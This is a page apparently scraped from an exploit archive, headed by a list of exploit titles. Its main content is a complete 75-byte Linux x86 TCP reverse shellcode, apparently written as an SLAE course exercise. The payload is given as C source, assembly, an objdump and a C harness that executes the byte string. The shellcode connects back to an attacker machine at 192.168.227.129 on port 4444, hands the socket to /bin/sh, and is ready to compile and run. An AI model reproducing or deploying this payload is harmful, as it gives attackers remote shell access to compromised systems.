29f0764fac
9 new exploits Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit Joomla <= 1.0.9 - (Weblinks) Remote Blind SQL Injection Exploit Microsoft Excel Malformed FEATHEADER Record Exploit (MS09-067) Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067) Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability Seo Panel 2.2.0 - Cookie-Rendered Persistent XSS Vulnerability VLC AMV Dangling Pointer Vulnerability VLC - AMV Dangling Pointer Vulnerability Movable Type 4.2x_ 4.3x Web Upgrade Remote Code Execution Movable Type 4.2x_ 4.3x - Web Upgrade Remote Code Execution Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability HP Client Automation Command Injection HP Client - Automation Command Injection Persistent Systems Client Automation Command Injection RCE Persistent Systems Client Automation - Command Injection RCE ElasticSearch Unauthenticated Remote Code Execution ElasticSearch - Unauthenticated Remote Code Execution ElasticSearch Search Groovy Sandbox Bypass ElasticSearch - Search Groovy Sandbox Bypass Fedora abrt Race Condition Exploit Fedora - abrt Race Condition Exploit ProFTPD 1.3.5 Mod_Copy Command Execution ProFTPD 1.3.5 - Mod_Copy Command Execution Windows ClientCopyImage Win32k Exploit Microsoft Windows - ClientCopyImage Win32k Exploit Wolf CMS Arbitrary File Upload To Command Execution Wolf CMS - Arbitrary File Upload To Command Execution Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1) Kaseya VSA uploader.aspx Arbitrary File Upload Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload Samsung Galaxy S6 - Samsung Gallery Bitmap Decoding Crash Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux 2 (MS16-008) Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008) Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008) Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1) NETGEAR ProSafe Network Management System 300 Arbitrary File Upload NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032) Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032) OS X / iOS Suid Binary Logic Error Kernel Code Execution OS X / iOS - Suid Binary Logic Error Kernel Code Execution Novell ServiceDesk Authenticated File Upload Novell ServiceDesk - Authenticated File Upload Mach Race OS X Local Privilege Escalation Exploit Mach Race OS X - Local Privilege Escalation Exploit Oracle ATS Arbitrary File Upload Oracle Application Testing Suite (ATS) - Arbitrary File Upload Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit) HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit) WordPress Lazy Content Slider Plugin 3.4 - (Add Catetory) CSRF Hide.Me VPN Client 1.2.4 - Privilege Escalation InstantHMI 6.1 - Privilege Escalation Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash PoC Microsoft WinDbg logviewer.exe - Crash PoC Linux x86 TCP Reverse Shellcode - 75 bytes php Real Estate Script 3 - Arbitrary File Disclosure CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval Streamo Online Radio And TV Streaming CMS - SQL Injection
177 lines
No EOL
5.9 KiB
C
Executable file
177 lines
No EOL
5.9 KiB
C
Executable file
/*
|
|
# Linux x86 TCP Reverse Shellcode (75 bytes)
|
|
# Author: sajith
|
|
# Tested on: i686 GNU/Linux
|
|
# Shellcode Length: 75
|
|
# SLAE - 750
|
|
|
|
------------c prog ---poc by sajith shetty----------
|
|
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
|
|
int main(void)
|
|
|
|
{
|
|
|
|
int sock_file_des;
|
|
struct sockaddr_in sock_ad;
|
|
//[1] create socket connection
|
|
//Man page: socket(int domain, int type, int protocol);
|
|
sock_file_des = socket(AF_INET, SOCK_STREAM, 0);
|
|
|
|
|
|
//[2]connect back to attacker machine (ip= 192.168.227.129)
|
|
//Man page: int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
|
|
|
|
sock_ad.sin_family = AF_INET;
|
|
sock_ad.sin_port = htons(4444);
|
|
sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129");
|
|
connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad));
|
|
//[3]Redirect file descriptors (STDIN, STDOUT and STDERR) to the socket using DUP2
|
|
//Man page: int dup2(int oldfd, int newfd);
|
|
|
|
dup2(sock_file_des, 0); // stdin
|
|
dup2(sock_file_des, 1); // stdout
|
|
dup2(sock_file_des, 2); // stderr
|
|
|
|
//[4]Execute shell (here we use /bin/sh) using execve call
|
|
|
|
//[*]Man page for execve call
|
|
//int execve(const char *filename, char *const argv[],char *const envp[]);
|
|
|
|
execve("/bin/sh", 0, 0);
|
|
}
|
|
----------------------end of c program--------------
|
|
|
|
global _start
|
|
|
|
section .text
|
|
|
|
_start:
|
|
;[1] create socket connection
|
|
;Man page: socket(int domain, int type, int protocol);
|
|
;sock_file_des = socket(2,1,0)
|
|
|
|
xor edx, edx
|
|
push 0x66 ; socket call(0x66)
|
|
pop eax
|
|
push edx ; protocol = 0
|
|
inc edx
|
|
push edx ; sock_stream = 1
|
|
mov ebx, edx ; EBX =1
|
|
inc edx
|
|
push edx ; AF_INET =2
|
|
mov ecx, esp ; save the pointer to args in ecx register
|
|
int 0x80 ; call socketcall()
|
|
|
|
; int dup2(int oldfd, int newfd);
|
|
mov ebx, eax ; store sock_file_des in ebx register
|
|
mov ecx, edx ; counter = 2
|
|
loop:
|
|
mov al, 0x3f
|
|
int 0x80
|
|
dec ecx
|
|
jns loop
|
|
; sock_ad.sin_family = AF_INET;
|
|
;sock_ad.sin_port = htons(4444);
|
|
;sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129");
|
|
;connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad));
|
|
xchg ebx, edx ; before xchg edx=2 and ebx=sock_file_des and after xchg ebx=2, edx=sock_file_des
|
|
push 0x81e3a8c0 ; sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129");
|
|
push word 0x5C11 ; sock_ad.sin_port = htons(4444);
|
|
push word bx ; sock_ad.sin_family = AF_INET =2;
|
|
mov ecx, esp ; pointer to struct
|
|
|
|
mov al, 0x66 ; socket call (0x66)
|
|
inc ebx ; connect (3)
|
|
push 0x10 ; sizeof(struct sockaddr_in)
|
|
push ecx ; &serv_addr
|
|
push edx ; sock_file_des
|
|
mov ecx, esp ; save the pointer to args in ecx register
|
|
int 0x80
|
|
|
|
mov al, 11 ; execve system call
|
|
cdq ; overwriting edx with either 0 (if eax is positive)
|
|
push edx ; push null
|
|
push 0x68732f6e ; hs/b
|
|
push 0x69622f2f ; ib//
|
|
mov ebx,esp ; save pointer
|
|
push edx ; push null
|
|
push ebx ; push pointer
|
|
mov ecx,esp ; save pointer
|
|
int 0x80
|
|
|
|
-------------obj dump------------
|
|
rev_shell1: file format elf32-i386
|
|
|
|
|
|
Disassembly of section .text:
|
|
|
|
08048060 <_start>:
|
|
8048060: 31 d2 xor edx,edx
|
|
8048062: 6a 66 push 0x66
|
|
8048064: 58 pop eax
|
|
8048065: 52 push edx
|
|
8048066: 42 inc edx
|
|
8048067: 52 push edx
|
|
8048068: 89 d3 mov ebx,edx
|
|
804806a: 42 inc edx
|
|
804806b: 52 push edx
|
|
804806c: 89 e1 mov ecx,esp
|
|
804806e: cd 80 int 0x80
|
|
8048070: 89 c3 mov ebx,eax
|
|
8048072: 89 d1 mov ecx,edx
|
|
|
|
08048074 <loop>:
|
|
8048074: b0 3f mov al,0x3f
|
|
8048076: cd 80 int 0x80
|
|
8048078: 49 dec ecx
|
|
8048079: 79 f9 jns 8048074 <loop>
|
|
804807b: 87 da xchg edx,ebx
|
|
804807d: 68 c0 a8 e3 81 push 0x81e3a8c0
|
|
8048082: 66 68 11 5c pushw 0x5c11
|
|
8048086: 66 53 push bx
|
|
8048088: 89 e1 mov ecx,esp
|
|
804808a: b0 66 mov al,0x66
|
|
804808c: 43 inc ebx
|
|
804808d: 6a 10 push 0x10
|
|
804808f: 51 push ecx
|
|
8048090: 52 push edx
|
|
8048091: 89 e1 mov ecx,esp
|
|
8048093: cd 80 int 0x80
|
|
8048095: b0 0b mov al,0xb
|
|
8048097: 99 cdq
|
|
8048098: 52 push edx
|
|
8048099: 68 6e 2f 73 68 push 0x68732f6e
|
|
804809e: 68 2f 2f 62 69 push 0x69622f2f
|
|
80480a3: 89 e3 mov ebx,esp
|
|
80480a5: 52 push edx
|
|
80480a6: 53 push ebx
|
|
80480a7: 89 e1 mov ecx,esp
|
|
80480a9: cd 80 int 0x80
|
|
|
|
-----------------------------------------------
|
|
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
|
|
*/
|
|
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
unsigned char code[] = \
|
|
|
|
"\x31\xd2\x6a\x66\x58\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x89\xc3\x89\xd1\xb0\x3f\xcd\x80\x49\x79\xf9\x87\xda\x68"
|
|
"\xc0\xa8\xe3\x81" //IP address 192.168.227.129
|
|
"\x66\x68"
|
|
"\x11\x5c" // port 4444
|
|
"\x66\x53\x89\xe1\xb0\x66\x43\x6a\x10\x51\x52\x89\xe1\xcd\x80\xb0\x0b\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
|
|
|
|
|
|
main()
|
|
{
|
|
printf("Shellcode Length: %d\n", strlen(code));
|
|
int (*ret)() = (int(*)())code;
|
|
ret();
|
|
} |